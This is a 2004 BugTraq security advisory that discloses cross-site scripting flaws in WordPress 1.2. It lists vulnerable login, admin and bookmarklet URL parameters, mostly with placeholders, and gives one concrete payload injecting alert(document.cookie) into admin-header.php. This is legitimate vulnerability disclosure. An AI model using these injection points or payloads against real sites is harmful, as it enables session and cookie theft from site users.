BugTraq
Multiple XSS Vulnerabilities in Wordpress 1.2 Sep 27 2004 11:16PM
Thomas Waldegger (bugtraq morph3us org)


Vendor : Wordpress

URL : http://wordpress.org/

Version : Wordpress 1.2

Risk : XSS

Description:

WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. [...]

Go to http://wordpress.org/ for detailed information.

Cross Site Scripting:

wp-login.php:

/wp-login.php?redirect_to=[XSS]

/wp-login.php?mode=bookmarklet&text=[XSS]

/wp-login.php?mode=bookmarklet&popupurl=[XSS]

/wp-login.php?mode=bookmarklet&popuptitle=[XSS]

Nearly every file in the administration panel of wordpress is vulnerable for XSS attacks.

admin-header.php:

/admin-header.php?redirect=1&redirect_url=%22;alert(document.cookie)//

Nice bug. ;o)

bookmarklet.php:

/bookmarklet.php?popuptitle=[XSS]

/bookmarklet.php?popupurl=[XSS]

/bookmarklet.php?content=[XSS]

/bookmarklet.php?post_title=[XSS]

categories.php:

/categories.php?action=edit&cat_ID=[XSS]

edit.php:

/edit.php?s=[XSS]

edit-comments.php:

/edit-comments.php?s=[XSS]

/edit-comments.php?mode=[XSS]

and so on ...

Solution:

There is not any solution yet. I contacted Matthew Mullenweg, one of the lead developers of wordpress, on Wednesday but I did not receive any answer until yet.

Credits:

Thomas Waldegger

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus